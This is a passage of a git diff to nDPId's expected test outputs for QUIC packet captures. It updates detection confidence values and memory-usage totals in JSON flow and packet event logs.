{"4":"DPI"},"proto":"QUIC.Cloudflare","breed":"Acceptable","category":"Web"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":253,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":253,"flow_first_seen":1591267474847,"flow_last_seen":1591267477602,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":236167,"flow_avg_l4_payload_len":933,"midstream":0,"thread_ts_msec":1591267477602,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Cloudflare","breed":"Acceptable","category":"Web"}} 
00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":253,"source":"quic-28.pcap","alias":"nDPId-test","packets-captured":253,"packets-processed":253,"total-skipped-flows":0,"total-l4-payload-len":236167,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1591267477602} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 253/253 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5886789 bytes -~~ total memory freed........: 5886789 bytes -~~ total allocations/frees...: 118388/118388 +~~ total memory allocated....: 6020423 bytes +~~ total memory freed........: 6020423 bytes +~~ total allocations/frees...: 121150/121150 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2068 chars diff --git a/test/results/quic-29.pcap.out b/test/results/quic-29.pcap.out index d0eba5aec..297009d41 100644 --- a/test/results/quic-29.pcap.out +++ b/test/results/quic-29.pcap.out 
@@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-29.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592171671664} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592171671664,"flow_last_seen":1592171671664,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1592171671664,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02130{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592171671664,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1592171671664,"pkt":"bmImQfCg7jdRvai\/CABFAAUA8Z1AAEARMDsKCQABCgkAAo7sAbsE7BkSwv8AAB0S824HvwtwiO8oxx1Iisqv85\/8EUOUTtoYvrflSLONN1vzwqO8AES3Q7WQp5eFbP47Q12xYKXOiuR8OKc8Zd+z5\/wDTiaB2gylmmpfXoWWnW9m4cfo29uCTrqUeoQcDlNjFKjOZThrp+QrfaDvzF+TP2mbdVAn5DVFyc3TGw9yc6eNagzixiAUYroBLFYv1DYB54ctmkUUCF38C+LrP5XSP2Zcs3QEOQDdiNvhWKUx+vneyJD2Ddv1Of313oIRItyeXVn2LxKac2RjP4PRAhodOpWDrnkB66u8HOFxUv4Q9HU8anll\/ZatcRtN\/kzzFFzf5YoYXwbtiynEhfyRDYp9NIa5aU5ngHDoeAIY8EqAjkZzDBZrpJEN70XKdgxbZ09x248vkii\/BYPsm8gwjS+Z+NMDUp5BndSqJan6LYduiBKS1FQ2ECMHPifIAeRkFfGsYIjcHELHJvd3bjIuQ5jcLDQ11GM29Aqw0CMdlCZ0GZUFJPoOBYtbWkB+AArzMv7l1fpdC85LE6kYaNSupy\/kxn4q0Fd9nlOil4czF7np40hmUQT5zuUOIMe57G4ak0l7jLPPFgnjPcuJ5+bhZHgxqEou6YPiVeaRUocITEWkE47FVdJ4XctN7CMWrbtrVTRyiKoG5jKjipRDy+FAnWpWY5dsQU4VKty4nhdiXpcyaazCMiTBlzAZlJ+9vVzyUo2gVZTdT1AmyQCJjmCzYg+wq4NqxE5hDx4BVlFY7VlIfT+LOXZeM++nsIOJaY7JaSW2i+1ji7jGvwvZ+l6xB5JTnisqnUTdF8GRkRAiTg25HBspHwtWrq\/Po4lqvzDZYM3JiaCh5C8UbvK9JJyDT8vEGu5LZu4vyW+zCsCEy6HtYm+Tl+y0wBH9TYuhybK9k4L\/MkebKAkQQeZPvBNwHsBWnmGK44Fke47qlm10TFPJJuYjv3s2WkxpofqtAF0qtGkvoZjB6BMweDMLBzljRd+MpcpgKx6R7LMPjs6dfEoyR\/++4fMZPmZ5nKh9L2NomKnJgnI\/Q7cjkj8+4G7DpTq\/5CiPCn768EbsWDr31eOflbsg2q5K0cAqBbvuSWrrcKEWWT9pbchcsh+CF4s8+eUg6FJomv69IBBZDRAHTYWn3VGlccxntEoW7HpxMfIbSnMt1P6bfNeHK9ADAu1LaTZlKkjjmK+gbjyes7l1CGt0SYwE5uDE0ieZjOn+NT2n96TJjl6343hGsZGGMospEVXz6DJx68jscskAGRLftunAK4Wcrbm0MVyZUbf68HXckrAHSl5ZN\/gbwXjHwC\/6kW\/aiMNhQdY8NhboJQcKwTMbOAeVwKF1KGzLGKNIqA8cRIBh1T1WLCqei3k8gd\/C7bxKNgXzYeJGw\/scGAKCWrce0B8GF8XORgu1hVv6Mwd\/suBo\/oG9g9Uq0JP+2Gj4EQHkZYzIbeC00Rkd0VLJzec5p8sOl7k1oJ2JxQnDqWq6c8EgrVrSv8x08C46hCl\/izdOK7GvwGEQaUkOOkL0AriEREHoeCFJRFtP85AqwidJc
h8tbK+7ugQPN0bUklhiKNfnQ3Ch72i6f0K8Dx8w3Oub6KBk7WsmEtFBIijRDgwb5rVjtiIuJyF+6hegy2WW6xf3iWQ7NMMjWxMe231j5YtMgDPBTVbFARaKzxZnq\/YZAw=="} -00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592171671664,"flow_last_seen":1592171671664,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1592171671664,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"localhost","version":"TLSv1.3","alpn":"h3-29","ja3":"b3e43d74f4b790abca2f5fe7dd06e7cf","tls_supported_versions":"TLSv1.3"}} +00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592171671664,"flow_last_seen":1592171671664,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1592171671664,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"localhost","version":"TLSv1.3","alpn":"h3-29","ja3":"b3e43d74f4b790abca2f5fe7dd06e7cf","tls_supported_versions":"TLSv1.3"}} 
00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592171671665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":159,"pkt_l4_len":125,"thread_ts_msec":1592171671665,"pkt":"7jdRvai\/bmImQfCgCABFAACRmvtAAEARi0wKCQACCgkAAQG7juwAfRSj8P8AAB0RQ5RO2hi+t+VIs403W\/PCo7wSLpoy7UXJBmrU+awywdI8GeSAtpBzddspmsO4wBFhAc+lOZRs3AvW96rBMIqSb8d5pE1izlVnQvJ\/MknH+txz1mHxROZRbUIezbGG599\/tfDcAoDEnt9M4O+IUzLE"} 02135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592171671666,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1592171671666,"pkt":"bmImQfCg7jdRvai\/CABFAAUA8Z5AAEARMDoKCQABCgkAAo7sAbsE7BkSzv8AAB0SLpoy7UXJBmrU+awywdI8GeSAEUOUTtoYvrflSLONN1vzwqO8O7aQc3XbKZrDuMARYQHPpTmUbNwL1veqwTCKkm\/HeaRNYs5VZ0LyfzJJx\/rcc9Zh8UTmUW1CHs2xhuffRHwK3nve7Gs3tZecUJrzqDFyJk9VgauDIb0Z+rvJbpolNkK6o7LgasAqmBRAbZcMPXVvUfKsLiSsD4SILcWD+XvuWr3Bh6tm+Qfkza+b6iZPubm3DVwSuys\/Xdp90g3J3Xk1P0fVr4\/DBW7XGGDkoxhXT\/JK9l4UPRIVyi5S\/s\/HCP+EDwylk5NF4afjQaGSFHvpGz1rfWgSbWW9+sMKYreG0NJGBDTiOkzrmoNuPwZsLcClKrT8DHkz+OgR9k4HlGmCBbxjhS5EqHAPTN0p9tNIZWR+C\/qUiEONzWWHajForYbyQn2DUiK6yBo+OQYvqxa3oZpGE1ifu6+st0otshaii7hYat8QkKrneLy15mdLcw7PZ9xSTYArs9hr4+vj1cqKUtxqRPTiLF4dCvRIhEX4wsiVHTQs1H5VlPwKxJq579LyeS+qFj4KdmvZBFiZFw+OSy3NncA0jvHpvDNazCZw8\/tYybqvtyop8EVUiQlHyJg8YNQ+aWO8ypOTwvNIGYKTaPxXZMvN35yLXrvtf4haVdzH0G1+kC1uUCGWP2BWNjQ\/TVG8grG7RsHGbnZn8RfXhU4qdScFjhJ31TwgAH0lYn4+u9lnJAIs5sT9WTUkrdZcS\/sM3LeHI6MKWpycP8D28jlxLUcx\/dMgCF27Jh3BsCbctlNdL8hYW38Zr2U49ykd7WZpXsGAA1nzsNfuIwfkQE4VyGHnLjXrXxRxrD6N7QDeL7eK3kUjZyC5W534QYFYrh0HWuZfiukwt3neFrc0vgyMMdUKTmaa96v1P5OJVaakJ7Ko50Ic\/ccvWMdP
83+NPcs+7HRXK4yG1yRzMwkmF0e\/57Dhb4ZsYBnI3JAGnaJwAbPLn7nBCtX11JVis76ALA\/EFVyoyCMj1RVsAHT\/DccWKXtdquQdm5INifNuOA564SVFMA0ccofKzicAZJiC7kfXk6QXdl0MLrIa5kBoBc0Jy5c\/hRqi1jxPFSJ4InRQNc9l\/l2XOPXUXc7GNf40YnCF9ge02seRVw5QgAxzztym8sQ\/GYuUd0UgGwdukDWiwqiuJGtn0Mf0hSpoDxXo0GxXy5ROaCq+Yj9+rOhxfWf+y2j1esQpB+lboWDqRNGPph3H9QluST7Lui0v+n2oEV84+fsaSRoIRNleP\/qkuvCpXsIrFGtk7NdB1Z8Zdm3+Q8oB0824BsnbIqBS6PVSMa5uQ7IDT19Rii201P9HjbIFdWd6f4nkoa7QLBzeQZCl5mk4NmwWPlKeVRJy8VolVes2J755oyt5f4B18ZbY7A13RZDfxUDmg9vvPRXS5gGtrj7EEBsE5b+jNiBsYGPfCajHLvvXuZJzWTgs5GIF2fZMlW3pKokAdhk\/JtyHS9+vfZXldxcnCxBcwh\/+X5Jvp0OY666uN2Hix0VsHswxfto+CE3l1fROmKv5hQv6DrppojEXU\/Bywn1HyxPBMx4G4LIAeSl0XzQ9LpI\/snJgv3oFDbMQMXW6dKIL6toQLmRPmeW2MoTht4gvwKXj8RRQP4umFHd\/MZAMVQ=="} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1592171671664,"flow_last_seen":1592171671699,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1592171671699,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"quic-29.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1592171671664,"flow_last_seen":1592171671699,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1592171671699,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":36588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"quic-29.pcap","alias":"nDPId-test","packets-captured":15,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":8756,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1592171671699} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 15/15 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879986 bytes -~~ total memory freed........: 5879986 bytes -~~ total allocations/frees...: 118150/118150 +~~ total memory allocated....: 6013620 bytes +~~ total memory freed........: 6013620 bytes +~~ total allocations/frees...: 120912/120912 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2140 chars diff --git a/test/results/quic-33.pcapng.out b/test/results/quic-33.pcapng.out index c31ec36a4..503b3a94f 100644 
--- a/test/results/quic-33.pcapng.out +++ b/test/results/quic-33.pcapng.out 
@@ -2,10 +2,10 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-33.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1607938456563} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1607938456563,"flow_last_seen":1607938456563,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1607938456563,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1607938456563,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1607938456563,"pkt":"AAAAAAAAAAAAAAAAht1gIDHwBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAByOYRWwTYBOvLAAAAAQiH9eh3C8+VTAijB72XkxHdoQBEtoviUAck6tyLLoPW9VDwFsyJg3YOj5\/ZBBxoLZq+uwOezSI+NQXptD5by+TGWuPRPrDAYZviuXsVHC7HmqDeEDG8QAq3dV\/xeXm5rkywye7b+vdo1p1fctM\/Oux9r7eV+Bkfx5+wJ0fdvlhyFGnTrwdcg8+4C7doPPgPdg\/HlJ+WJBdBNlB5bMDPwE7kBX2Dh4rUsRtMuI8UcuXEYHPlESOyFKyqmw1DOdGJ\/piVc003W0\/LEq1Eo7qm+0VXxD0O2HOCIiEHQSR0LHjT1VxLfzhAmJaat83P4NhBjDwwPEBaziMk5Xx7FlGTbjmQXwNdCCRvlZwHV8Z1FjV1KFEWUlByB6YIRcrWgtYq\/i+4joHr0arERD7m6OPY7fw34Aislp\/J5tfwN5lpBEW4eq0YBQWIW+o0WsbDygLLOE8qK7VrIW545\/s6vWmiqY\/nX3eqKbXLLa\/FVUoUAYah6VY+54jT2WSxlVbjRbKzNCmQ7iFaNpCpIEDqRUT3251KkF2ic95oNqA7SdIHar3DhA1BLknCroi9vMu8dB8ZQzinHdG0dXM7MT\/3xjsj6W1BusBxpaKNCgk4AWnV4woWWMHuv3AkSN3SkyzvUkLVvh69eozjggDPPRwSQSUAzHDWzbhw1M0maJHN9uf4A3ju1BNcFXtgNbzbLvZ8jRjuvbV5+sT2dKCIGszHbDe\/k7VIj14F5Oz9yEIDLSjcjUNYxAEtmmIW3gkE0URoURbr4fR+9IcL0qzkw6dXZu343bgbz5HR6MUnSxTpV9fqwSf9hnrNjraoPMA+2dRpP1Zgg8SJxppmH92oRToz9aDvX2GEC3Onm3NhLiCy9XRFGhGu\/fP4euaO\/LhZROPQcNzbK0KhgrgIkbbcdw+GG0U1DyrSN2MCSa0G\/gdd0iXjRkpuSltfEWcs6h5VKXYCs0nARTLsAmshRBI4tBnyE8czB9KDGhDi69S4dxLc2GhDvI7sBC3oYplXnPFpYJ5UZlYX4x4JzCNfzPKJLkB1GZ\/\/fH4d4Bdn3o+N0leV4SXwVyj8+XQXm2lqcn0l4280XR1PY9wT7WxHSwRDVHU1WF+J6uEthL0G\/TTOA8IENfk0c9FtN1gtuZbVqEenj8UavApG8YgiwEFLw3lw7QwEpdl2suMFgNMJ9GKiLgGbJ0iDoFumS7lgCZ\/nQNWC5kLAQ+6RwzRxTfyP7COmrj9VOCl2+wDLTe3MfV2rc9okYbhZWBQ90PNxn4RsPjc\/Y6ROnBtAhNHbhNOY4vkKTiqPf\/zXa6gyKLJwM4B2ikSmnMEc6pOt0km1BxO3IMATJR3y2TyvQwDT4h3LmpQf0gEdwRzggs5B+E7eqr4GF3leCUThvLN07bE6f2xjlfM9GVfW\/hyXIlfEkPiVHs0uNEuAtqja9wjv+TVSELvsqoLajQtysd2XscH\/uqkhI80k6EzletW\/z347Tefjbi7un6kw52zxXR3upATGE
cY8WECkFSms+LV3Cbtq+fVkM8LR8ZIcoDoUWH511e8PHOE07KwOpTJwROur3JKswX2UtackuKBEnRIb2VrFAu8O8Bq\/G9385WeZn1kznfucxDKavwZd9obaQ66d2I\/H3+7RezClYA=="} -01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1607938456563,"flow_last_seen":1607938456563,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1607938456563,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} +01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1607938456563,"flow_last_seen":1607938456563,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1607938456563,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": 
{"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} 02138{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1607938456566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1607938456566,"pkt":"AAAAAAAAAAAAAAAAht1gLBAvBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABEVvI5gTYBOuKAAAAAQijB72XkxHdoQg7VxcI2Jvc+wBAmyNACkF8YFqpKbrULKoDb19+uZg6qvjJtwEJ\/uOaQSa3OSU6O4kzdS3stlDlI1x0pxU6U1p+48IkszqoivEYtB69bd+ITaYbTkxaelp3jMONrgP7+RVKaRNSt1HkpjhOcLPrzWczoHNZnIhNfvDy2JT2t08AucggcJe2\/4B\/vdnrtpqK6V\/yqwGFTMu1rQIkxS92C6tKauoy9+VqrwAAAAEIowe9l5MR3aEIO1cXCNib3PtEAuCsTgG\/NlsvOl6GJP2fa9o99BT145OKWZuTcmr433tc4jI7eA6S9XkiunJFKo6ZwPI0CMllqhzpZg\/M2oExoGin\/1BGN9cmCUQfuYgNqfFCtG+9ndT9HYjrsBCdjtJLmxL7rPr9q0tjGpDyuXZi9R4mNROPUrln\/PkhZzgiM0sHtdd5p\/bNeUYtEqE7ldAVt6\/n44lU+YN3SU+JWXbqssVrfvVzr36h3ab7fYZ2wDsFWfe3UAXx72w0FuOOYB7+7UQe00b5Z0z5SyfSm4P9dPYqojw9+jCHeJHd8IAkR4khzwJfJ3q7ZLCXjemRtbjS+jOnIFHSC581L8cRfFE0puRn3ZcyA6eigK1\/b\/IulmnDweMhm5uzPfRzVpuYtDAmfupBBO\/lq0x9UE6G6aXlrZk5pUsV\/Pqkms2\/6G+WtFFZQVjHMyjk00Lt801D4RBFQF6Pahphh1rFyerbrHyGpVjzLCCjQyphY+Ef9GwnSwZSXfDtl5l6V75F8hdBb7eRQwoSsYy2TAPUn+5EgUUMa1L0FdqwqulhpTwuiKxlEjCwVmTxOQ9cg0ckmklTggiUpDihR6CGEJh4wbwQvtSQI7moaNImb3zhI+1KDCqOesSmC0luDPiQ6HVXRRmZBTcfdXaVe6yn8aOTSuCvFQcYVZJMmDXWA3tjd8oaA17lJRBbd52Hesk8cJ\/YJxx85q2dKnHlb3PDDd1GsYUOHckqW9oBPW3OnKOCPAmLbdAwZewxw5NCtlvRr65YuEBJebGFHlf1HDlzUGnZEYOFz7QCUVI0Cm1TQGPnrse0LdnJMU4XAsVFTZ0rmN1WZ7lpL6siOc2kDO70InGs0erREqxP56ACsZJMVSLIWh+Wtd1TXT7s1cqcJTYFE1niy2vrWekG6gLj5S6d+Rex
zQMJFxrY7r+11SACpmCHMFInRkZ2X9ItKQsY5EbZalkFRVlIPVyM4egzMKz9sn52T\/vMFKgNzwFrf2sp17iUQaz1IyM4BWPhByUmfVEtsPpNhTudVAjT+DAK93H3WyrArXi\/C2kIO6kQjQL8MrdQf21Vn+lMg29055+PrObIIyJyGedJEXiBJHhcPUZyzw5wKIN3qGujdkkwR3NWZGQsR9D9oFcHebuLVvyY9rfcmZsewBxwBuE+3j7ZET5hnurVax3LpMwvKOC7lHimTxsExq+Apn9MfGeNafcclrRpd8qOhu5Y\/D9oPxLb43JPWxWrwE9\/H\/\/i9MLl+t0zWNInh13oyE1g07E++NmYobon6Smh\/KGoGULC6seHfmLDTFHYkzCH+jMiW6zoYiu7MVxzW\/pT13bjivVb6\/E5Iu6Gt0D2z7Y6bkUG7P9GxtXA2I4cOhOe8m7St\/U9gg=="} 01473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1607938456566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":805,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":805,"pkt_l4_len":751,"thread_ts_msec":1607938456566,"pkt":"AAAAAAAAAAAAAAAAht1gLBAvAu8RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABEVvI5gLvAwKiAAAAAQijB72XkxHdoQg7VxcI2Jvc+0EX7RIgJstg2q\/pC81tAEQflatapq\/RZQEybKUVkOQrHxIiM3xbz3ZbafCyVgp9YFd+JrcvMCpFHqt9ha4UaWT\/CVOhVDMl+x8Qz2Pi7UbhXXzBIpETH8Z7GAVhwJp3720klhijkJwcoDMcJhlagIc47WtHZyC2\/NvYhyD6pe18qYPoUjuwqv+wJE\/ZuFV52ejpLWx76nNhIhGaoM22WiUW2N20UYQh0kubnK8ydedmguDEIxF73mmjfBjQU7d+\/kjc6w69nvaNM1WUtVe+1pIxu53jikC+jWmnb37byYPq9yuXiC3\/7jLmxfDtd9m0NACttAKJA\/JNnc1mj5nC7Y4hcumqIR3HrbC6nuLoYsXX2Zp0f9UgYV0fEqMHvZeTEd2hiKBY6bJdCuJKiCqdgeiTl8HqX5mvvlLWJPlmCEJCqIrxf4AkkUVGE4BSMBWdBgCOEniMLjdilc+qHYhwYNZ7tIGoZF6d6e+Y9Yje+rmHUnbpVz7jAirlBT5H70Gx8i7gxMgFdddmzogwCmelHc7wvmzlC3bbPNEkyFgFvBjt104z4kXXH0FdVNTjvLWqMrMbCISgSyaKcGImnAuSczuqI+IdDAVMV3KZetnbRYTODT0MnkiyhjZS2c2FGhXiSczCoL+nOf5G7u0IMQ1S2B5gWkWA4zkPvuFc+aQWgo\/5D9qUsPB6Q6\/Lj7MI5fOlLauhfzQmW9GNJRpuqdg3\/ZmECJ9z4HnHnfJd1luO6tXDuMawQhxYeD2xpO\/QqBEAH7sAsFTq\/abn1uTe8vqVNYsZRf0hwJAKRW\/BJxg25OGxhUlcywIb3vGZoq+dJmTxYWX\/eqXVDs+dco62ygOlroB9wJoypHt\/D+y7eYcgKaWYE3hnP28kNmmEQuWhfqoLHNJTZas1p5oY5kezaxnU27xSuQXqGdvZdYxhIaICM8EHXUKIOqW8fx5oue03v9